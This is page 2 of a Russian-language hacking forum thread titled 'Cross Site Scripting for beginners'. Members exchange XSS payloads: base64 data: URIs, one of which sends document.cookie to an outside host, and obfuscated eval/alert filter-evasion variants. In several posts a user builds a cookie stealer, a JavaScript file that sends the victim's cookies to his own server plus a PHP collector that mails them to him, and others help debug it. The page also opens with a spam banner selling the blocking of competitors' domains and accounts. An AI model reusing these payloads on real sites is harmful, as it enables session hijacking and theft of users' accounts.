УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Cross Site Scripting для новичков

Страница 2 из 3

Опции темы

Поиск в этой теме

Опции просмотра

#11

10.07.2007, 19:43

~~Digimortal~~

Banned

Регистрация: 22.08.2006

Сообщений: 608

Провел на форуме:
6144796

Репутация: 1095

мдя, в ФФ1.5 и в minefild - срабатует нормально => ее можно считать браузерозависимой xss
в операх от 8 до 9-й версии такого эффекта не наблюдается.. (хотя и можно некоторым образом ее использовать)
а ie вообще data не поддерживает..

беру свои слова насчет, того, что ты не разобрался в этой xss назад,
но все же, статья получилась поверхностной и недоработанной: когда работаешь с xss - проверять ее работоспособность на наиболее популярных браузерах имхо ПРОСТО ОБЯЗАТЕЛЬНО.. если б ты проделал подобную работу сейчас бы не было тут наших споров и статья бы имела большую полезность..

#12

10.07.2007, 21:03

Zitt

Познавший АНТИЧАТ

Регистрация: 07.05.2006

Сообщений: 1,031

Провел на форуме:
5885100

Репутация: 773

Отправить сообщение для Zitt с помощью ICQ

имхо зря вы на него накинулись, афтор не задавался целью описать все апекты xss в подробностях.... ТО что надо для первого ознакомления и понимая сути присутствует....

Цитата:

А теперь попробуйте зайти на любой форум, войти под своим именем пользователя и ввести в браузере, не уходя с форума, адрес:data:text/html;base64, PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcH Q+

(с) http://www.cyberinfo.ru/index.php?newsid=1078

Куки алертицца)

Последний раз редактировалось Zitt; 10.07.2007 в 21:16..

#13

10.07.2007, 22:39

~~gemaglabin~~

Banned

Регистрация: 01.08.2006

Сообщений: 725

Провел на форуме:
7681825

Репутация: 4451

На античате тысяча и одна статья как пихать <script>alert()</script , но никто не копает глубже.Вам не надоело писать одно и тоже ТЫСЯЧУ раз?

Код:

onclick='123["e"[0]+"v"[0]+"a"[0]+"l"[0]](alert(/1/))
onclick='open*eval*(alert(/1/))
onclick=top['ev'["con"+"cat"]('al')](alert(/1/))

Последний раз редактировалось gemaglabin; 10.07.2007 в 22:42..

#14

10.07.2007, 23:23

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

Цитата:

Сообщение от [53x]Shadow

А как на счет https://forum.antichat.ru/thread42951.html ?

А там написано что-то новое?)))

__________________

#15

14.07.2007, 16:25

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

Провел на форуме:
6520559

Репутация: 2947

Цитата:

Сообщение от _Pantera_

2 Вписуеться в окно браузера

PHP код:


		
			
data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTsgaW1nLnNyYyA9ICJodHRwOi8vc2l0ZS5ydS9pbWFnZS5naWY/Iitkb2N1bWVudC5jb29raWU7PC9zY3JpcHQ+

Firefox/2.0.0.4 думаю на других работать тоже должно

можно и просто так... на любых браузерах...

Цитата:

javascript:alert(document.cookie);

#16

14.07.2007, 18:51

ettee

Administrator

Регистрация: 12.10.2006

Сообщений: 466

Провел на форуме:
17234747

Репутация: 5170

Data -протокол (IE его не поддерживает), это относится к уязвимости ПО (Опера и к браузерам построенных на движке Gecko).

Последний раз редактировалось ettee; 17.01.2010 в 01:42..

#17

04.01.2012, 17:02

cleric.80

Участник форума

Регистрация: 28.03.2008

Сообщений: 127

Провел на форуме:
588541

Репутация: 19

Отправить сообщение для cleric.80 с помощью ICQ

кул, я добрался до XSS )

тока вопросы появились, помогите ?

- создал файлы : s.php, image.gif, .htaccess, 1.js, залил на хост,

вопрос 1 (содержимое файла 1.js) :

img=new Image(); img.src="http://cleric.16mb.com/image.gif?"+document.cookie; - так правильно ?

вопрос 2 "скрипт, который крадет куки. Вот он:" :

img = new Image(); img.src = "http://cleric.16mb.com/image.gif?"+document.cookie; - так ?

вопрос 3 "и давать уже ссылку на наш скрипт" :

http://www.site.ru/index.php?id= - как будет выглядеть в моем случае ? если сайт где все лежит такой : http://cleric.16mb.com/index.html

#18

04.01.2012, 18:46

cleric.80

Участник форума

Регистрация: 28.03.2008

Сообщений: 127

Провел на форуме:
588541

Репутация: 19

докрутил s.php и вот что приходит..

IP: xx.xxx.x.xxx

Adress:

Query:

что я сделал не так или не докрутил

#19

04.01.2012, 18:54

cleric.80

Участник форума

Регистрация: 28.03.2008

Сообщений: 127

Провел на форуме:
588541

Репутация: 19

s.php :

а вот результат на почту приходит :

IP: 85.115.248.xxx

Adress:

Query:

вопрос где куки и как оне выглядят то ?

#20

04.01.2012, 19:04

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

Цитата:

Сообщение от cleric.80

cleric.80 said:
s.php :

а вот результат на почту приходит :
IP: 85.115.248.xxx
Adress:
Query:
вопрос где куки и как оне выглядят то ?

Посмотри в Опере куки, если там есть от нужного сайта, то ошибка у тебя, если нет(я почти уверен в этом), то на мыло соответственно ничего не приходить

P.S. Если не получается перечитай первый пост внимательно.

P.S.S 111-сообщение.

Страница 2 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход